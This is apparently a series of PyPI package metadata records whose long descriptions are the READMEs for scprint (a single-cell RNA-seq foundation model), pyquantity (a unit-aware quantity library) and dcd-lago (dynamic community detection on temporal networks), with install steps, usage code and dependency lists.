] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:17:27.952060 | najaeda-0.4.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl | 2,718,210 | ce/b7/91ac90b5a01cfe8663cf1c7a26d154d436c2cf57aac70eafa462b7727f35/najaeda-0.4.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl | cp39 | bdist_wheel | null | false | 7c22e3b82f8b582abcc1319fc5a8dc6d | edb808aa818585ffda2f457f22410449a60d1d787f3f46f36c21bdfbae2e0776 | ceb791ac90b5a01cfe8663cf1c7a26d154d436c2cf57aac70eafa462b7727f35 | null | [] | 1,664 |
2.4 | scprint | 2.3.8 | scPRINT is a Large Cell Model for Gene Network Inference, Denoising and more from scRNAseq data | > ℹ️ main place where scprint is built and maintained
> 🎊 The scPRINT-2 model has now been released:
> [https://github.com/cantinilab/scPRINT-2](https://github.com/cantinilab/scPRINT-2)
# scPRINT: Large Cell Model for scRNAseq data
[](https://codecov.io/gh/cantinilab/scPRINT)
[](https://github.com/cantinilab/scPRINT/actions/workflows/main.yml)
[](https://badge.fury.io/py/scprint)
[](https://pepy.tech/project/scprint)
[](https://pepy.tech/project/scprint)
[](https://pepy.tech/project/scprint)
[](https://img.shields.io/github/issues/cantinilab/scPRINT)
[](https://github.com/psf/black)
[](https://doi.org/10.5281/zenodo.14749466)
[](https://huggingface.co/jkobject/scPRINT)

scPRINT is a large transformer model built for the inference of gene networks
(connections between genes explaining the cell's expression profile) from
scRNAseq data.
It uses novel encoding and decoding of the cell expression profile and new
pre-training methodologies to learn a cell model.
scPRINT can be used to perform the following analyses in a zero-shot mode:
- **expression denoising**: increase the resolution of your scRNAseq data
- **cell embedding**: generate a low-dimensional representation of your dataset
- **label prediction**: predict the cell type, disease, sequencer, sex, and
ethnicity of your cells
- **gene network inference**: generate a gene network from any cell or cell
cluster in your scRNAseq dataset
It is a foundation model and can be fine-tuned to perform any other analysis
[Read the manuscript!](https://www.biorxiv.org/content/10.1101/2024.07.29.605556v1)
if you would like to know more about scPRINT. Have a look at some of my
[X-plainers](https://twitter.com/jkobject).

🎊 test scPRINT and scDataloader on this simple
[google collab](https://colab.research.google.com/drive/1CacoQDAwJn86tq2sBhUoZ6M-xAqsYFDI#scrollTo=Lb4E9IhQ7NK8)
## Table of Contents
- [scPRINT: Large Cell Model for scRNAseq data](#scprint-large-cell-model-for-scrnaseq-data)
- [Table of Contents](#table-of-contents)
- [scPRINT-2](#scprint-2)
- [Use `scPRINT`](#use-scprint)
- [try scPRINT in superbio.ai!](#try-scprint-in-superbioai)
- [try scPRINT on a google colab notebook!](#try-scprint-on-a-google-colab-notebook)
- [To know: lamin.ai](#to-know-laminai)
- [install](#install)
- [pytorch and GPUs](#pytorch-and-gpus)
- [follow up](#follow-up)
- [Usage](#usage)
- [scPRINT's basic commands](#scprints-basic-commands)
- [Documentation](#documentation)
- [Docker](#docker)
- [Simple tests:](#simple-tests)
- [FAQ](#faq)
- [I have a dataset and want a quick analysis:](#i-have-a-dataset-and-want-a-quick-analysis)
- [I have a dataset and want some more control over what is going on and which model to use:](#i-have-a-dataset-and-want-some-more-control-over-what-is-going-on-and-which-model-to-use)
- [What does my anndata need to contain to be run with scPRINT](#what-does-my-anndata-need-to-contain-to-be-run-with-scprint)
- [I want to generate gene networks from scRNAseq data:](#i-want-to-generate-gene-networks-from-scrnaseq-data)
- [I want to generate cell embeddings and cell label predictions from scRNAseq data:](#i-want-to-generate-cell-embeddings-and-cell-label-predictions-from-scrnaseq-data)
- [I want to denoise my scRNAseq dataset:](#i-want-to-denoise-my-scrnaseq-dataset)
- [I want to generate an atlas-level embedding](#i-want-to-generate-an-atlas-level-embedding)
- [I need to generate gene tokens using pLLMs](#i-need-to-generate-gene-tokens-using-pllms)
- [I want to re-train scPRINT from scratch on my own data](#i-want-to-re-train-scprint-from-scratch-on-my-own-data)
- [I want to fine-tune scPRINT on my own data](#i-want-to-fine-tune-scprint-on-my-own-data)
- [how can I find if scPRINT was trained on my data?](#how-can-i-find-if-scprint-was-trained-on-my-data)
- [can I use scPRINT on other organisms rather than human?](#can-i-use-scprint-on-other-organisms-rather-than-human)
- [how long does scPRINT takes? what kind of resources do I need? (or in alternative: can i run scPRINT locally?)](#how-long-does-scprint-takes-what-kind-of-resources-do-i-need-or-in-alternative-can-i-run-scprint-locally)
- [I have different scRNASeq batches. Should I integrate my data before running scPRINT?](#i-have-different-scrnaseq-batches-should-i-integrate-my-data-before-running-scprint)
- [where to find the input gene embeddings?](#where-to-find-the-input-gene-embeddings)
- [I want to extract output gene embeddings from scPRINT](#i-want-to-extract-output-gene-embeddings-from-scprint)
- [I have an issue with sqlite3](#i-have-an-issue-with-sqlite3)
- [Development](#development)
- [dev install](#dev-install)
- [Reproducibility](#reproducibility)
- [Building the Docker Image](#building-the-docker-image)
- [Pulling the Docker Image from Docker Hub](#pulling-the-docker-image-from-docker-hub)
- [Running the Docker Container](#running-the-docker-container)
- [Participate](#participate)
- [Work in progress (PR welcomed):](#work-in-progress-pr-welcomed)
## scPRINT-2
You can now checkout and use also the
[scPRINT-2 model](https://github.com/cantinilab/scPRINT-2)
## Use `scPRINT`
For the moment, scPRINT has been tested on MacOS and Linux (Ubuntu 20.04) with
Python 3.10. Its instalation takes on average 10 minutes.
If you want to be using flashattention2, know that it only supports triton 2.0
MLIR's version and torch==2.0.0 for now.
### try scPRINT in superbio.ai!
[HERE](https://app.superbio.ai/apps/67333115ed44f27eb717cf84)
### try scPRINT on a google colab notebook!
[](https://colab.research.google.com/drive/1CacoQDAwJn86tq2sBhUoZ6M-xAqsYFDI#scrollTo=Vj73HINSzKHL)
### To know: lamin.ai
To use scPRINT, you will need to use [lamin.ai](https://lamin.ai/). This is
needed to load biological informations like genes, cell types, organisms.. (but
also to manage the pre-training datasets if this is something you want to set
up)
### install
To start you will need to do: (I would really push you to use uv as it is so
much faster for the installation!
[Here, is how to install uv](https://docs.astral.sh/uv/getting-started/installation/)
```bash
uv venv <env-name> --python 3.10 #scprint might work with python >3.10, but it is not tested
source <env-name>/bin/activate
#one of
uv pip install scprint
# OR uv pip install scprint[dev] # for the dev dependencies (building etc..) OR
# OR uv pip install scprint[flash] # to use flashattention2 with triton: only if you have a compatible gpu (e.g. not available for apple GPUs for now, see https://github.com/triton-lang/triton?tab=readme-ov-file#compatibility)
#OR pip install scPRINT[dev,flash]
lamin init --storage ./testdb --name test --modules bionty
```
⚠️ `./testdb` is set in this example but be mindful about where you want to
store your data, this might get quite big as you use it and if you are on
specific partition you want to consider this.
if you start with lamin and had to do a `lamin init`, you will also need to
populate your ontologies. This is because scPRINT is using ontologies to define
its cell types, diseases, sexes, ethnicities, etc.
([link to view ontologies](https://www.ebi.ac.uk/ols4/ontologies/cl/classes/http%253A%252F%252Fpurl.obolibrary.org%252Fobo%252FCL_0000057))
you can do it via the command:
`scdataloader populate all`
⚠️ It is ok to get warnings with this function
or with this function:
```python
from scdataloader.utils import populate_my_ontology
populate_my_ontology() #to populate everything (recommended) (can take 2-10mns)
populate_my_ontology( #the minimum for scprint to run some inferences (denoising, grn inference)
organisms: List[str] = ["NCBITaxon:10090", "NCBITaxon:9606"],
sex: List[str] = ["PATO:0000384", "PATO:0000383"],
celltypes = None,
ethnicities = None,
assays = None,
tissues = None,
diseases = None,
dev_stages = None,
)
```
We make use of some additional packages we developed alongside scPRINT (they are
also shipped with scprint already).
Please refer to their documentation for more information:
- [scDataLoader](https://github.com/jkobject/scDataLoader): a dataloader for
training large cell models.
- [GRnnData](https://github.com/cantinilab/GRnnData): a package to work with
gene networks from single cell data.
- [benGRN](https://github.com/jkobject/benGRN): a package to benchmark gene
network inference methods from single cell data.
### pytorch and GPUs
scPRINT can run on machines without GPUs, but it will be slow. It is highly
recommended to use a GPU for inference.
Most of the time, everything works out of the box, otherwise please follow up:
#### follow up
If you start fresh in GPU programming, you need to have installed the required
drivers, you might need to install a specific version of pytorch that is
compatible with your drivers (e.g. nvidia 550 drivers will lead to a nvidia
toolkit 11.7 or 11.8 which might mean you need to re-install a different flavor
of pytorch for things to work. e.g. using the command:
`pip install torch==2.2.0 torchvision==0.17.0 torchaudio==2.2.0 --index-url https://download.pytorch.org/whl/cu118`
on my case on linux.
I was able to test it with nvidia 11.7, 11.8, 12.2.
If you do not have [triton](https://triton-lang.org/main/python-api/triton.html)
installed you will not be able to take advantage of GPU acceleration, but you
can still use the model on the CPU.
If you do not have gpus and loading from a checkpoint, you will need to specify
`transformer="normal"` in the `load_from_checkpoint` function like so:
```python
model = scPrint.load_from_checkpoint(
'../data/temp/last-v1.ckpt', precpt_gene_emb=None,
transformer="normal")
```
you will know more by following the
[get-started](https://cantinilab.github.io/scPRINT/notebooks/cancer_usecase/)
notebook.
## Usage
To get a sense of how scPRINT works, have a look at our
[get-started](https://cantinilab.github.io/scPRINT/notebooks/cancer_usecase/)
notebook.
To start you will also need to download a checkpoint of a pretrain model like
medium-v1.5 or some others from
[hugging face](https://huggingface.co/jkobject/scPRINT/)
```bash
$ hf download jkobject/scPRINT medium-v1.5.ckpt --local-dir .
```
### scPRINT's basic commands
This is the a template of how you would go and use scPRINT most of the time:
```py
# import stuff
from lightning.pytorch import Trainer
from scprint import scPrint
from scdataloader import DataModule
# setup a datamodule to train scprint from scratch
datamodule = DataModule(...)
# setup a model parameter
model = scPrint(...)
# to train / fit / test the model setup a trainer
trainer = Trainer(...)
# call the fit function
trainer.fit(model, datamodule=datamodule)
# to do predictions Denoiser, Embedder, GNInfer
denoiser = Denoiser(...)
adata = sc.read_h5ad(...)
denoiser(model, adata=adata)
...
```
or, from a bash command line
then finetune or analyse on your data
```bash
$ scprint fit/train/predict/test/denoise/embed/gninfer --config config/[medium|large|vlarge] ...
```
to denoise a dataset:
```bash
$ scprint denoise --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --output_filename denoised.h5ad
```
to do embedding and classification on a dataset: (the current version implies
doing a PCA and Umap so it might need a lot of RAM if run as is)
```bash
$ scprint embed --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --output_filename embedded.h5ad
```
to do gene network inference on a dataset:
```bash
$ scprint gninfer --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --cell_type 'cell_type_name_from-cell_type-obs_col' --output_filename grn.h5ad
```
to finetune scPRINT on your data:
```bash
$ scprint fit --config config/base_v2.yml --config config/pretrain_large.yml --ckpt_path large-v1.ckpt
```
find out more about the commands by running `scprint --help` or
`scprint [command] --help`.
more examples of using the command line are available in the
[docs](./docs/usage.md).
## Documentation
For more information on usage please see the documentation in
[https://www.jkobject.com/scPRINT/](https://cantinilab.github.io/scPRINT)
## Docker
By using the `scPRINT Docker image`, you can bypass the complexities of manual
package installation, ensuring a consistent deployment environment. Included in
this repository is a Dockerfile that lets you craft a container for the project;
you have the choice to either build this image on your own or conveniently pull
it from Docker Hub.
Make sure that you have the `docker` command line interface installed on your
system.
A recommended way to install docker with the correct nvidia drivers on linux is
to use this
[script](https://gist.github.com/xueerchen1990/baad7baa545cb547e8633bc9e5b84786)
/!\ A MORE UP TO DATE DOCKER IMAGE is made as part of the open-problems
benchmark and available in their github for all tasks where scPRINT is
benchmarked
### Simple tests:
An instalation of scPRINT and a simple test of the denoiser is performed during
each commit to the main branch with a
[Github action](https://github.com/cantinilab/scPRINT/actions) and
[pytest workflow](.github/workflows/main.yml). It also provides an expected
runtime for the installation and run of scPRINT.
We now explore the different usages of scPRINT:
## FAQ
### I have a dataset and want a quick analysis:
-> use [superbio](#try-scprint-in-superbioai)
### I have a dataset and want some more control over what is going on and which model to use:
you will need to understand a few things like lamindb, scdataloader and
scprint's inference tool.
-> start with a quick intro using the
[google collab notebook](#try-scprint-on-a-google-colab-notebook)
-> look at the other FAQ element based on your desired use-case
### What does my anndata need to contain to be run with scPRINT
-> your anndata only needs to contain the species ontology id in its
obs['organism_ontology_term_id'] (e.g. "NCBITaxon:9606"). It also needs to
contain .var_names or .var.index with gene ids defined as ENSEMBL_IDs or
HUGO_SYMBOL.
-> That's it. you can then follow the preprocessing steps from various example
notebooks to align your anndata to our gene set, make sure that it fits our
requirements and then send it to the model!
### I want to generate gene networks from scRNAseq data:
-> Refer to the section . gene network inference in
[this notebook](./docs/notebooks/cancer_usecase.ipynb#).
-> More examples in this notebook
[./notebooks/assessments/bench_omni.ipynb](./notebooks/bench_omni.ipynb).
### I want to generate cell embeddings and cell label predictions from scRNAseq data:
-> Refer to the embeddings and cell annotations section in
[this notebook](./docs/notebooks/cancer_usecase.ipynb#).
### I want to denoise my scRNAseq dataset:
-> Refer to the Denoising of B-cell section in
[this notebook](./docs/notebooks/cancer_usecase.ipynb).
-> More example in our benchmark notebook
[./notebooks/assessments/bench_denoising.ipynb](./notebooks/bench_denoising.ipynb).
### I want to generate an atlas-level embedding
-> Refer to the notebook [nice_umap.ipynb](./figures/nice_umap.ipynb).
### I need to generate gene tokens using pLLMs
To run scPRINT, you can use the option to define the gene tokens using protein
language model embeddings of genes. This is done by providing the path to a
parquet file of the precomputed set of embeddings for each gene name to scPRINT
via "precpt_gene_emb"
-> To generate this file please refer to the notebook
[generate_gene_embeddings](notebooks/generate_gene_embeddings.ipynb).
### I want to re-train scPRINT from scratch on my own data
-> Refer to the documentation page [pretrain scprint](docs/pretrain.md)
### I want to fine-tune scPRINT on my own data
-> make sure that you did a few run of scPRINT's inference e.g.
[this one](#i-want-to-generate-cell-embeddings-and-cell-label-predictions-from-scrnaseq-data)
-> make sure that you read the [pretrain scprint](docs/pretrain.md)
documentation
-> re-use the same logic as in the
[scprint-train](notebooks/scprint_train.ipynb) notebook but apply the necessary
modification in term of tasks, learning rate or parameter-efficient-fine-tuning
method, if you think you will need it (given the small size of the model, this
not necessary at all). This is the step where you will get your hands dirty. you
might want to really understand how the model
[collates](https://www.jkobject.com/scDataLoader/collator/) data, and
[train](https://cantinilab.github.io/scPRINT/model/#scprint.model.model.scPrint.training_step)
### how can I find if scPRINT was trained on my data?
If your data is available in cellxgene, scPRINT was likely trained on it.
However some cells, datasets were dropped due to low quality data and some were
randomly removed to be part of the validation / test sets.
### can I use scPRINT on other organisms rather than human?
scPRINT has been pretrained on both humans and mouse, and can be used on any
organism with a similar gene set. If you want to use scPRINT on very different
organisms, you will need to generate gene embeddings for that organism and
re-train scPRINT
### how long does scPRINT takes? what kind of resources do I need? (or in alternative: can i run scPRINT locally?)
please look at our supplementary tables in the
[manuscript](https://www.biorxiv.org/content/10.1101/2024.07.29.605556v1)
### I have different scRNASeq batches. Should I integrate my data before running scPRINT?
scPRINT takes raw count as inputs, so please don't use integrated data. Just
give the raw counts to scPRINT and it will take care of the rest.
### where to find the input gene embeddings?
If you think you need the gene embeddings file for loading the model from a
checkpoint, you don't, as the embeddings are also stored in the model weights.
You just need to load the weights like this:
```python
model = scPrint.load_from_checkpoint(
'../../data/temp/last-v1.ckpt',
precpt_gene_emb=None,
)
```
You can also recreate the gene embedding file through
[this notebook](notebooks/generate_gene_embeddings.ipynb). Just call the
functions, and it should recreate the file itself.
the file itself is also available on
[hugging face](https://huggingface.co/jkobject/scPRINT/tree/main)
/!\ Please understand that what I mean by gene embedding are the immutable input
gene embeddings encoding the gene name. scPRINT directly takes raw counts as
input and takes care of doing the embedding on the fly. (it does similarly for a
gene's location in the genome).
### I want to extract output gene embeddings from scPRINT
I created a novel task script that should work similarly to the other ones (make
sure that you understood how they work by running at least one inference
notebook) in [scprint/tasks/gene_emb.py](scprint/tasks/gene_emb.py) `
### I have an issue with sqlite3
1. Install a newer sqlite module: `uv pip install "pysqlite3-binary>=0.5.2"`
2. Add a sitecustomize.py so Python uses it instead of the stdlib sqlite:
```python
# create in ./scprint1/lib/python3.12/site-packages/sitecustomize.py
import pysqlite3 # noqa: F401
import sys
sys.modules["sqlite3"] = pysqlite3
```
3. Restart your Django process.
This is the fastest path and usually works well for Django.
## Development
### dev install
If you want to use the latest version of scPRINT and work on the code yourself
use `git clone` and `pip -e` instead of `pip install`.
```bash
git clone https://github.com/cantinilab/scPRINT
git clone https://github.com/jkobject/scDataLoader
git clone https://github.com/cantinilab/GRnnData
git clone https://github.com/jkobject/benGRN
pip install -e scPRINT[dev]
pip install -e scDataLoader[dev]
pip install -e GRnnData[dev]
pip install -e benGRN[dev]
```
### Reproducibility
**To reproduce the paper please use the version / tag `1.6.4` and you will have
to git clone the repo to have access to all the pre-training functionalities!**
⚠️ When re-training scPRINT from scratch, by default, every N epoch, the
`test()` function will be called `. It is using a predownloadedtest datasets
paths (see https://github.com/cantinilab/scPRINT/issues/12). Replace them with
your own paths you want to use these test functions. They are also made
available on hf.co: https://huggingface.co/jkobject/scPRINT/tree/main
### Building the Docker Image
To build the Docker image from the provided `Dockerfile`, run the following
command from the root directory of this repository:
```bash
docker build -t scprint:latest -f Dockerfile .
```
### Pulling the Docker Image from Docker Hub
If you don't want to build the image yourself, you can pull it directly from
Docker Hub:
```bash
docker pull jkobject/scprint:1.2.0
docker tag jkobject/scprint:1.2.0 scprint:latest
```
### Running the Docker Container
Once you have the image (either by building it or pulling it), you can start a
container with:
```bash
docker run --gpus all --rm -it scprint:latest bash
```
Please note: When running the Docker container, ensure you mount any necessary
folders using the -v option to access them inside the container.
### Participate
Read the [CONTRIBUTING.md](CONTRIBUTING.md) file.
Read the
[training runs](https://wandb.ai/ml4ig/scprint_scale/reports/scPRINT-trainings--Vmlldzo4ODIxMjgx?accessToken=80metwx7b08hhourotpskdyaxiflq700xzmzymr6scvkp69agybt79l341tv68hp)
document to know more about how pre-training was performed and the its behavior.
code coverage is not right as I am using the command line interface for
now. >50% of the code is covered by my current unit test.
Acknowledgement:
[python template](https://github.com/rochacbruno/python-project-template)
[laminDB](https://lamin.ai/) [lightning](https://lightning.ai/)
## Work in progress (PR welcomed):
1. remove the triton dependencies
2. add version with additional labels (tissues, age) and organisms (mouse,
zebrafish) and more datasets from cellxgene
3. version with separate transformer blocks for the encoding part of the
bottleneck learning and for the cell embeddings
4. improve classifier to output uncertainties and topK predictions when unsure
5. setup latest lamindb version
Awesome Large Cell Model created by Jeremie Kalfon.
| text/markdown | null | jeremie kalfon <jkobject@gmail.com> | null | null | null | GRN, foundation model, gene regulatory network, large cell model, scPRINT, scRNAseq, transformer | [] | [] | null | null | <3.13,>=3.10 | [] | [] | [] | [
"array-api-compat>=1.9.0",
"attridict>=0.0.9",
"bengrn>=1.3.0",
"biomart>=0.9.0",
"bionty>=1.0.0",
"biopython",
"contourpy>=1.3.1",
"d3graph>=2.5.1",
"docstring-parser>=0.15",
"einops>=0.3.0",
"fair-esm>=0.5.0",
"future>=1.0.0",
"gget>=0.29.1",
"grnndata>=1.1.5",
"gseapy>=1.1.8",
"h5py>=3.12.1",
"huggingface-hub>=0.10.0",
"hydra-core>=1.1.0",
"ipykernel>=6.17.0",
"jsonargparse>=4.0.0",
"lamindb==2.1.1",
"leidenalg>=0.10.0",
"lightning>=2.3.0",
"matplotlib==3.9.3",
"numba>=0.56.0",
"numpy<2.0.0,>=1.24.0",
"owlready2>=0.36",
"pandas>=2.0.0",
"patsy>=0.5.6",
"pynndescent>=0.5.11",
"pytorch-lightning>=2.3.0",
"rich>=10.0.0",
"scdataloader>=2.1.0",
"scib-metrics>=0.1.0",
"scib>=1.0.0",
"scikit-learn==1.6.0",
"scikit-misc>=0.5.0",
"scipy>=1.7.0",
"seaborn>=0.11.0",
"setuptools<=75.8.0,>=58.0.0",
"simpler-flash==1.0.7",
"sparse>=0.15.4",
"supabase>=2.15.0",
"tensorly>=0.6.0",
"torch==2.2.0",
"torchaudio>=0.12.0",
"torchdata>=0.7.1",
"torchmetrics==1.6.0",
"torchtext>=0.13.0",
"torchvision>=0.13.0",
"typeshed-client>=2.0.0",
"urllib3<1.27.0,>=1.26.0",
"wandb>=0.12.0",
"celltypist>=0.1.1; extra == \"dev\"",
"coverage>=7.3.2; extra == \"dev\"",
"datamapplot>=0.4.2; extra == \"dev\"",
"datasets>=3.0.1; extra == \"dev\"",
"gitchangelog>=3.0.4; extra == \"dev\"",
"magic-impute>=3.0.0; extra == \"dev\"",
"mkdocs-git-authors-plugin>=0.4.0; extra == \"dev\"",
"mkdocs-git-revision-date-localized-plugin>=1.0.0; extra == \"dev\"",
"mkdocs-jupyter>=0.2.0; extra == \"dev\"",
"mkdocs>=1.5.3; extra == \"dev\"",
"mkdocstrings-python>=0.10.0; extra == \"dev\"",
"mkdocstrings>=0.22.0; extra == \"dev\"",
"papermill>=2.5.0; extra == \"dev\"",
"pytest-cov>=4.1.0; extra == \"dev\"",
"pytest>=7.4.3; extra == \"dev\"",
"ruff>=0.6.4; extra == \"dev\"",
"triton==2.2.0; extra == \"flash\""
] | [] | [] | [] | [
"repository, https://github.com/jkobject/scPRINT"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:17:04.765576 | scprint-2.3.8.tar.gz | 106,202 | d3/10/0d7afa104c92a6710b437462ebd40e7f1c0f520b69a13de6acbb04b80741/scprint-2.3.8.tar.gz | source | sdist | null | false | b097692c06e913086ed92cc69af9f0b5 | 65e9038fc2753b574e2eb28ae11bb270aeb623fd1b4667ff41f50db139d337df | d3100d7afa104c92a6710b437462ebd40e7f1c0f520b69a13de6acbb04b80741 | MIT | [
"LICENSE"
] | 227 |
2.4 | pyquantity | 0.1.15 | A modern Python package for quantity calculations | # PyQuantity
[](https://github.com/odysseu/pyquantity/actions/workflows/ci.yml)






[](https://github.com/psf/black)
A Python package for quantity calculations with unit support and dimensional analysis.
**Test Coverage**: 
## Features
- Comprehensive unit systems with 60+ base dimensions
- 1000+ derived units including mechanical, electrical, and thermal units
- Full SI prefix support from yocto to yotta
- Contextual measurements with built-in database
- Natural language parsing for quantity extraction
- Advanced physics calculations
- Type hints and comprehensive documentation
## Installation
```bash
pip install pyquantity
```
**Requirements:**
- Python 3.10 or higher (following [Python's version support policy, mostly](https://devguide.python.org/versions/))
**For Developers:**
```bash
pip install -e ".[dev]"
python test_with_coverage.py
```
## Quick Start
```python
from pyquantity import Quantity, get_measurement, parse_quantity
# Basic quantity operations
length = Quantity(5.0, "meter")
width = Quantity(3.0, "meter")
area = length * width
# Unit conversion
distance = Quantity(1.5, "kilometer")
distance_m = distance.convert("meter")
# Contextual measurements
bath = get_measurement("normal bath")
cup = get_measurement("cup")
cups_in_bath = bath / cup
# Natural language parsing
text = "A car traveling at 120 km/h for 2.5 hours"
quantities = parse_quantity(text)
```
## Documentation
- [Usage Guide](docs/usage_guide.md)
- [Advanced Features](docs/advanced_features.md)
- [API Reference](docs/api_reference.md)
- [Examples](example_usage.py)
## License
MIT License - See [LICENSE](LICENSE) for details.
## Contributing
Contributions are welcome!
| text/markdown | Odysseu | Odysseu <uboucherie1@gmail.com> | null | null | MIT | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | https://github.com/odysseu/pyquantity | null | >=3.10 | [] | [] | [] | [
"black>=26.1.0; extra == \"dev\"",
"isort>=7.0.0; extra == \"dev\"",
"mypy>=1.19.1; extra == \"dev\"",
"pytest>=9.0.2; extra == \"dev\"",
"pytest-cov>=7.0.0; extra == \"dev\"",
"ruff>=0.15.1; extra == \"dev\"",
"build>=1.4.0; extra == \"dev\"",
"sphinx>=7.2.6; extra == \"dev\"",
"furo>=2025.12.19; extra == \"dev\"",
"myst-parser>=5.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/odysseu/pyquantity",
"Documentation, https://github.com/odysseu/pyquantity#readme",
"Repository, https://github.com/odysseu/pyquantity.git",
"Issues, https://github.com/odysseu/pyquantity/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:16:25.629221 | pyquantity-0.1.15.tar.gz | 38,781 | 60/9a/8db92a69a685d396dd60fd78a0b137612a9242ed93f7b8a326b1d8a97459/pyquantity-0.1.15.tar.gz | source | sdist | null | false | 76d794bcdead9f27125d2699d19142dc | 9a660b4b4db91a41fa58f0467a021951f46c7b219c02194e1b6f833d77900977 | 609a8db92a69a685d396dd60fd78a0b137612a9242ed93f7b8a326b1d8a97459 | null | [
"LICENSE"
] | 225 |
2.4 | dcd-lago | 1.0.4 | Python implementation of the LAGO method... | # Dynamic Community Detection: LAGO
**This library is a python implementation of the LAGO method for dynamic community detection on temporal networks.**
### Getting started using pip
```
pip install dcd-lago
```
## Link Streams and Dynamic Communities
**Link stream** (or stream graph) model enables temporal network to have **perfect temporal precision** of temporal links (also called edges or interactions).
Community detection is an essential task in static network analysis. It consists in grouping nodes so there is more edges within groups than between them.
Adapating this task to temporal networks means that groups may evolve over time and yet be consistent over time.
We call this task **Dynamic Community Detection**.
<div style="text-align: center;">
<img src="img/dcd_example.png" alt="Link Stream example with two dynamic communities" display:block; margin:auto; width="500" />
*Figure 1: Link stream made up of 5 nodes (a, ...,e) with time interactions over time represented with vertical dashed lines. Two dynamic communities are displayed in blue and green.*
</div>
**LAGO** (Longitudinal Agglomerative Greedy Optimization) is a method to detect dynamic communities on link streams which is inspired from most used community detection methods on static graphs. It is based on the greedy optimization of the Longitudinal Modularity, an adaptation of the Modularity quality function for communities on static networks.
## Usage
```python
from lago import LinkStream, lago_communities
```
```python
## Declare time links according to the following format:
# <source node>, <target node>, <time instant>
## Values must be integers
time_links = [
[2, 3, 0],
[0, 1, 2],
[2, 3, 3],
[3, 4, 5],
[2, 3, 6],
[2, 4, 7],
[0, 1, 8],
[1, 2, 9],
[3, 4, 9],
[0, 2, 10],
[1, 2, 11],
[3, 4, 13],
[1, 2, 14],
[2, 4, 16],
[0, 1, 17],
[0, 1, 18],
[2, 3, 18],
[3, 4, 19],
]
```
```python
## Initiate empty temporal network (as a link stream)
my_linkstream = LinkStream()
## Add time links to the link stream
my_linkstream.add_links(time_links)
# NOTE time links can also be imported from txt files with the read_txt() method
## Display linkstream informations
print(f"The link stream consists of {my_linkstream.nb_edges} temporal edges (or time links) accross {my_linkstream.nb_nodes} nodes and {my_linkstream.network_duration} time steps, of which only {my_linkstream.nb_timesteps} contain activity.")
```
```python
## Compute dynamic communities
dynamic_communities = lago_communities(
my_linkstream,
nb_iter=3, # run LAGO 3 times and return best result
)
# Each dynamic community is represented by a list of (<node>, <time instant>)
print(f"{len(dynamic_communities)} dynamic communities have been found")
```
#### Plot Dynamic Communities
```python
from lago import plot_dynamic_communities
fig = plot_dynamic_communities(
linkstream=my_linkstream,
communities=dynamic_communities,
)
fig.show()
```
#### Compute Longitudinal Modularity Score
```python
from lago import longitudinal_modularity
## Compute Longitudinal Modularity score
## (the higher the better / maximum is 1)
long_mod_score = longitudinal_modularity(
my_linkstream,
dynamic_communities,
)
print(f"Dynamic communities detected on the linkstream have a Longitudinal Modularity score of {long_mod_score} ")
```
## Advanced Parameters
LAGO is a greedy method for optimizing Longitudinal Modularity, which is a quality function for dynamic communities on temporal networks. Both have many options which affects both speed and communities shapes.
### Longitudinal Modularity
`lex` (Longitudinal Expectation):
Can be either Joint-Membership (JM) or Mean-Membership (MM). From a theoretical aspect, JM expects dynamic communities to have a very consistent duration of existence, whereas MM allows greater freedom in the temporal evolution of communities. Authors lack perspective on the impact of the choice on real data. Defaults to "MM".
`omega`: Time resolution Parameter indicating the required level of community continuity over time. Higher values lead to more smoothness in communities changes. Defaults to 2.
### LAGO
`refinement`: In greedy search optimization, a refinement strategy can improve results but increases computation time. Defaults to STEM.
| Refinement | Improvement | Time of execution|
| ----------- | ----------- | --------- |
| None | - | - |
| Single Time Node Movements (STNM) | + | +|
| Single Time Edge Movements (STEM) | ++ | ++ |
`refinement_in`: Whether to apply refinement strategy within the main optimization loop or not. If activated, results may be improved but requires more computation time. Defaults to True.
`fast_exploration`: lighter exploration loop. If activated, it significantly reduces the time of execution but may result in poorer results. Defaults to True.
## Feedback
LAGO method and the python library are constantly improving. If you have any questions, suggestions or issues, please add them to [GitHub issues](https://github.com/fondationsahar/dynamic_community_detection/issues).
## References
### LAGO Method
[*Discovering Communities in Continuous-Time Temporal Networks by Optimizing L-Modularity*](https://arxiv.org/abs/2510.00741) *(preprint)*
```
@misc{brabant2025discoveringcommunitiescontinuoustimetemporal,
title={Discovering Communities in Continuous-Time Temporal Networks by Optimizing L-Modularity},
author={Victor Brabant and Angela Bonifati and Rémy Cazabet},
year={2025},
eprint={2510.00741},
archivePrefix={arXiv},
primaryClass={cs.SI},
url={https://arxiv.org/abs/2510.00741},
}
```
### Longitudinal Modularity
[*Longitudinal Modularity, a Modularity for Link Streams*](https://rdcu.be/eC5fA)
```
@article{Brabant2025,
title = {Longitudinal modularity, a modularity for link streams},
volume = {14},
ISSN = {2193-1127},
url = {http://dx.doi.org/10.1140/epjds/s13688-025-00529-x},
DOI = {10.1140/epjds/s13688-025-00529-x},
number = {1},
journal = {EPJ Data Science},
publisher = {Springer Science and Business Media LLC},
author = {Brabant, Victor and Asgari, Yasaman and Borgnat, Pierre and Bonifati, Angela and Cazabet, Rémy},
year = {2025},
month = feb
}
```
